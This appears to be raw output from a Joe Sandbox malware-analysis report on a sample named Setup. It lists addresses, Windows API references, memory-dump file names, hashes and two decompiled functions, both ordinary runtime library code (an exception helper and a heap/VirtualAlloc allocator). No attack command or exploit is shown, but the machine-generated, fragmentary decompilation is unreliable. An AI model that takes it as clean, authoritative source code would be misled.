                                                                                                                                                              0x0044f67a
                                                                                                                                                              0x0044f67a
                                                                                                                                                              0x0044f67a
                                                                                                                                                              0x0044f681
                                                                                                                                                              0x0044f68e
                                                                                                                                                              0x0044f693
                                                                                                                                                              0x0044f69e
                                                                                                                                                              0x0044f6ac
                                                                                                                                                              0x0044f6b1
                                                                                                                                                              0x0044f6b7
                                                                                                                                                              0x0044f771
                                                                                                                                                              0x0044f786
                                                                                                                                                              0x0044f789
                                                                                                                                                              0x0044f791
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f77c
                                                                                                                                                              0x0044f782
                                                                                                                                                              0x0044f784
                                                                                                                                                              0x0044f795
                                                                                                                                                              0x0044f7a1
                                                                                                                                                              0x0044f7a3
                                                                                                                                                              0x0044f7a3
                                                                                                                                                              0x0044f7ac
                                                                                                                                                              0x0044f7b6
                                                                                                                                                              0x0044f7bb
                                                                                                                                                              0x0044f7c0
                                                                                                                                                              0x0044f7ce
                                                                                                                                                              0x0044f7d3
                                                                                                                                                              0x0044f7d4
                                                                                                                                                              0x0044f7d6
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7de
                                                                                                                                                              0x0044f7e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f784
                                                                                                                                                              0x0044f794
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0044F681
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0044F6AC
                                                                                                                                                                • Part of subcall function 00456A4C: RaiseException.KERNEL32(?,?,00417495,?,?,?,?,?,00417495,?,00544A68,?), ref: 00456A8E
                                                                                                                                                              Strings
                                                                                                                                                              • invalid string position, xrefs: 0044F686
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                              • API String ID: 1961742612-1799206989
                                                                                                                                                              • Opcode ID: 41e8345944dceef866e9bcd104b2444109eab020c7f016eb326f7da1192036a1
                                                                                                                                                              • Instruction ID: add6abddfee71d70b86efe27a181920542ec3159fd15ba36859697a7e8980588
                                                                                                                                                              • Opcode Fuzzy Hash: 41e8345944dceef866e9bcd104b2444109eab020c7f016eb326f7da1192036a1
                                                                                                                                                              • Instruction Fuzzy Hash: 55D012719402089BDB04EAD1CC42BDD7778BB1431AF40041AA50177086DBB95A48CA18
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0044F341 Relevance: 5.1, APIs: 4, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 48%
                                                                                                                                                              			E0044F341() {
				intOrPtr _t1;
				void* _t2;
				void* _t12;
				void* _t16;
				void* _t18;
				void* _t19;

				if( *0x5bc840 != 0 || E0044F1DA() != 0) {
					_t1 =  *0x5bc840; // 0x0
					if(_t1 != 1) {
						_t2 =  *0x5bc848(_t1);
						if(_t2 != 0) {
							return _t2;
						} else {
							_t18 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
							if(_t18 != 0) {
								_push( *0x5bc840);
								if( *0x5bc848() == 0) {
									_t16 = _t18;
									_t19 = _t18 + 0xff0;
									do {
										 *0x5bc844( *0x5bc840, _t16);
										_t16 = _t16 + 0x10;
									} while (_t16 < _t19);
									L13:
									return _t16;
								}
								VirtualFree(_t18, 0, 0x8000);
								goto L13;
							}
							goto L8;
						}
					} else {
						_t12 = HeapAlloc(GetProcessHeap(), 0, 0xd);
						if(_t12 == 0) {
							goto L8;
						} else {
							return _t12;
						}
					}
				} else {
					L8:
					return 0;
				}
			}









                                                                                                                                                              0x0044f2a9
                                                                                                                                                              0x0044f2b4
                                                                                                                                                              0x0044f2bc
                                                                                                                                                              0x0044f2d6
                                                                                                                                                              0x0044f2de
                                                                                                                                                              0x0044f340
                                                                                                                                                              0x0044f2e0
                                                                                                                                                              0x0044f2f1
                                                                                                                                                              0x0044f2f5
                                                                                                                                                              0x0044f2fe
                                                                                                                                                              0x0044f30e
                                                                                                                                                              0x0044f320
                                                                                                                                                              0x0044f322
                                                                                                                                                              0x0044f328
                                                                                                                                                              0x0044f32f
                                                                                                                                                              0x0044f335
                                                                                                                                                              0x0044f338
                                                                                                                                                              0x0044f33c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f33e
                                                                                                                                                              0x0044f318
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f318
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f2f5
                                                                                                                                                              0x0044f2be
                                                                                                                                                              0x0044f2c9
                                                                                                                                                              0x0044f2d1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f2d4
                                                                                                                                                              0x0044f2d4
                                                                                                                                                              0x0044f2d4
                                                                                                                                                              0x0044f2d1
                                                                                                                                                              0x0044f2f7
                                                                                                                                                              0x0044f2f7
                                                                                                                                                              0x0044f2fa
                                                                                                                                                              0x0044f2fa

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000D,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F2C2
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F2C9
                                                                                                                                                                • Part of subcall function 0044F1DA: IsProcessorFeaturePresent.KERNEL32(0000000C,0044F2B0,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F1DC
                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F2EB
                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416F18,?,00416F88,0000000D,?,?,?,?,00416CAE,00000000), ref: 0044F318
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocHeapVirtual$FeatureFreePresentProcessProcessor
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4058086966-0
                                                                                                                                                              • Opcode ID: 16e7b19f690fbd505acd56a4ef34f332f60cb3ca9fddfb0f5a395bba0b016975
                                                                                                                                                              • Instruction ID: bba78e7b3f5f76ffbaaea230f02ad9ca1bdd40546a675a28c4d26747fd10df00
                                                                                                                                                              • Opcode Fuzzy Hash: 16e7b19f690fbd505acd56a4ef34f332f60cb3ca9fddfb0f5a395bba0b016975
                                                                                                                                                              • Instruction Fuzzy Hash: E301F53524021167F7711B6CBC18F6B3AA5FBA0711F1602B2F904D72A0DB69EC4DA66C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%